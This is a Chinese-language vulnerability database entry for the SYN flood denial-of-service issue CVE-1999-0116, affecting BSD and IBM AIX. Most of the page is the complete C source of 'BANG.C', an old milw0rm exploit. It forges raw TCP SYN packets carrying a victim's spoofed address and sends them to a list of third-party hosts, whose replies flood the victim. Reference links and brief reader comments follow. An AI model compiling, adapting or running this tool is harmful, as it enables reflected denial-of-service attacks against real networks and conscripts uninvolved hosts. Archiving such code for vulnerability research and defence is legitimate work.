SYN数据包拒绝服务漏洞
漏洞ID | 1106977 | 漏洞类型 | 未知 |
发布时间 | 2002-09-17 | 更新时间 | 2002-09-17 |
CVE编号 | CVE-1999-0116 |
CNNVD-ID | CNNVD-199609-006 |
漏洞平台 | BSD | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
攻击者可以发送许多SYN数据包创建多个连接导致服务拒绝,该连接没有通过发送ACK来完成,也称为SYNflood。
|漏洞EXP
/*
* BANG.C Coded by Sorcerer of DALnet
*
* FUCKZ to: etech, blazin, udp, hybrid and kdl
* PROPZ : skrilla, thanks for all your help with JUNO-Z and especially this code :)
* --------------------------------
* REDIRECTION DOS FINALLY DISTRIBUTED !!!!!!
*
* This is POC and demonstrates a new method of DoS. The idea
* behind it is that the attacker generates connection requests
* to a list of hosts which have a TCP service running such as
* http (80), telnet (23) etc. from the ip of the victim host.
* This will result all of the hosts that the victim *requested*
* connections to send back packets (usually SYN-ACK's) 2-3 of
* them (amplification comes here!) causing load to the victim
* by cauzing the victim to send RST packets since it never actually
* requested any such connection. This attack is dangerous since
* its almost impossible to filter!!
*
* hosts file should be in the format of 1 ip:port per line
* i.e. 194.66.25.97:80
* 130.88.172.194:23
* 65.161.42.42:6667
* NOTE: target should only be ip, and all the hosts on the list should
* also be ips thats for speed issues.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#define __FAVOR_BSD
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
unsigned short int getrandportid(void);
unsigned short in_cksum(u_short *addr, int len);
short int send_syn(unsigned long int , unsigned long int, unsigned short int);
int sox;
struct pseudo {
unsigned long srca, dsta;
unsigned char zero, proto;
unsigned short tcplen;
};
struct checksum {
struct pseudo pp;
struct tcphdr tt;
};
/* Taken out since only works on x86 and rdtsc is also only pentium specific */
#if 0
/* Thanks to skrilla :) */
unsigned short mktcpsum1(struct packet *p,int len) {
unsigned short old_sum = p->tcpsum;
unsigned long s = (unsigned long)&p->sport;
unsigned long sum = ((p->src >> 16) + (p->src & 0xffff) + (p->dst >> 16) +
(p->dst & 0xffff) + (__htons__(6) + __htons__(len-20)));
p->tcpsum=0;
__asm__ __volatile__ (
/*"xorl %%eax,%%eax;"
"cmpl $2,%%ecx;"
"jb 1f;"
"0:;"
"lodsw;"
"addw %%ax,%%dx;"
"jnc 9f;"
"addl $65536,%%edx;"
"9:;"
"decl %%ecx;"
"loop 0b;"
"1:;"
"orb %%cl,%%cl;"
"jz 2f;"
"xorw %%ax,%%ax;"
"lodsb;"
"addw %%ax,%%dx;"
"jnz 2f;"
"addl $65536,%%edx;"
"2:;"
"movw %%dx,%%ax;"
"shrl $16,%%edx;"
"addw %%ax,%%dx;"
"adcl $0xffff0000,%%edx;"
"xorw $65535,%%dx;"*/
"movw %%dx,%%ax;"
"shrl $16,%%edx;"
"addw %%ax,%%dx;"
"adcw $0,%%dx;"
"testl $1,%%ecx;"
"jz 0f;"
"xorw %%ax,%%ax;"
"lodsb;"
"addw %%ax,%%dx;"
"adcw $0,%%dx;"
"0:;"
"shrl $1,%%ecx;"
"1:;"
"lodsw;"
"addw %%ax,%%dx;"
"adcw $0,%%dx;"
"loop 1b;"
"andl $65535,%%edx;"
"xorw $65535,%%dx;"
:"=edx"(sum):"edx"(sum),"ecx"(len-20),"S"(&p->sport):"eax");
p->tcpsum=old_sum;
return(sum);
}
unsigned long long int
rdtsc(void) {
unsigned long long int tsc;
unsigned long int tsc_l,tsc_h;
__asm__ volatile("rdtsc":"=%eax"(tsc_l),"=d"(tsc_h));
tsc=tsc_h;
tsc=(tsc<<32)|tsc_l;
return(tsc);
}
#endif
int
main(int argc, char **argv)
{
int enable=1,tmp,tmp2, loop, count=0;
char *lala, *tmp1, buf[25];
unsigned long int ip[1000000], src;
unsigned short int port[1000000];
FILE *fp;
struct timeval start, end;
printf("nCoded by Sorcerer of DALnetnn");
if(argc != 4){
fprintf(stderr, "Incorrect usage try: %s <victim> <host-file> <loop host-file>an", *argv);
fprintf(stderr, "Example: %s 127.0.0.1 myhostsfile.txt 3nn", *argv);
return(-1);
}
fp = fopen(argv[2], "r");
if(fp == NULL){
fprintf(stderr, "Error while opening: %sn", argv[2]);
perror("fopen");
return(-1);
}
loop = atoi(argv[3]);
if(loop == 0){
fprintf(stderr, "Cannot loop 0 times you need to loop at least oncen");
return(-1);
}
for(tmp=0;tmp<=1000000;tmp++){
ip[tmp] = htons(23);
port[tmp] = htons(23);
}
sox = socket(PF_INET, SOCK_RAW, 6);
if(sox == -1){ perror("socket"); return(-1); }
tmp = setsockopt(sox, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));
if(tmp == -1){ perror("setsockopt"); return(-1); }
printf("Reading ips on memory and reconstructing in network byte order...n"); fflush(stdout);
while(1){
memset(buf, 0, 25);
tmp1 = fgets(buf, 25, fp);
if(tmp1 == NULL) break;
if(strlen(buf) < 9) {
printf("Bogus entry: %sn", buf);
continue;
}
lala = strchr((char *)&buf, ':');
port[count] = htons(atoi(++lala));
buf[strlen(buf)-strlen(lala)-1] = ' ';
ip[count] = inet_addr(buf);
count++;
printf("."); fflush(stdout);
}
printf("Done.n");
src = inet_addr(argv[1]);
tmp = gettimeofday((struct timeval *)&start, NULL);
if(tmp == -1){ perror("gettimeofday"); return(-1); }
for(tmp2=0;tmp2<loop;tmp2++)
for(tmp=0;tmp<count;tmp++)
send_syn(src, ip[tmp], port[tmp]);
tmp = gettimeofday((struct timeval *)&end, NULL);
if(tmp == -1){ perror("gettimeofday"); return(-1); }
printf("nTotal time taken: %lunBytes sent: %dn", (end.tv_sec+end.tv_usec)-(start.tv_sec+start.tv_usec), count*loop*sizeof(char)*sizeof(struct ip)*sizeof(struct tcphdr));
return 0;
}
short int
send_syn(unsigned long int src, unsigned long int dst, unsigned short int port)
{
struct sockaddr_in s;
struct ip *i;
struct tcphdr *t;
struct pseudo p;
struct checksum c;
char packet[sizeof(char)*(sizeof(struct ip)+sizeof(struct tcphdr))];
int tmp;
s.sin_family = PF_INET;
s.sin_port = port;
s.sin_addr.s_addr = dst;
i = (struct ip *)&packet;
t = (struct tcphdr *)((int)i+sizeof(struct ip));
memset(&packet, 0, sizeof(packet));
i->ip_hl = 5;
i->ip_v = 4;
i->ip_tos = 0x08;
i->ip_len = htons(sizeof(packet));
i->ip_id = htons(getrandportid());
i->ip_off = 0;
i->ip_ttl = 255;
i->ip_p = 6;
i->ip_sum = 0;
i->ip_src.s_addr = src;
i->ip_dst.s_addr = dst;
t->th_sport = htons(getrandportid());
t->th_dport = port;
t->th_seq = htons(getrandportid());
t->th_ack = 0;
t->th_x2 = 0;
t->th_off = 5;
t->th_flags = 0x02;
t->th_win = 65535;
t->th_urp = 0;
t->th_sum = 0;
p.srca = src;
p.dsta = dst;
p.proto = 6;
p.tcplen = htons(sizeof(struct tcphdr));
p.zero = 0;
memcpy(&c.pp, &p, sizeof(p));
memcpy(&c.tt, t, sizeof(struct tcphdr));
t->th_sum = in_cksum((void *)&c, sizeof(c));
tmp = sendto(sox, packet, ntohs(i->ip_len), MSG_DONTWAIT, (struct sockaddr *)&s, sizeof(s));
if(tmp == -1){
perror("sendto");
return(-1);
}
return 0;
}
unsigned short int
getrandportid(void)
{
unsigned short int port;
struct timeval tv;
gettimeofday((struct timeval *)&tv, NULL);
srand(tv.tv_sec+tv.tv_usec);
port = rand()+1;
return(port);
}
/* Slow shit checksum function from RFC */
u_short
in_cksum(u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
// milw0rm.com [2002-09-17]
|受影响的产品
IBM AIX 4.2
IBM AIX 4.1
IBM AIX 3.2.5
|参考资料
来源:SUN
名称:00136
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc;=secbull/136
来源:SGI
名称:19961202-01-PX
链接:ftp://patches.sgi.com/support/free/security/advisories/19961202-01-PX
相关推荐: HP Praesidium Webproxy Unauthorized Access Vulnerability
HP Praesidium Webproxy Unauthorized Access Vulnerability 漏洞ID 1102278 漏洞类型 Access Validation Error 发布时间 2002-03-22 更新时间 2002-03-22…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666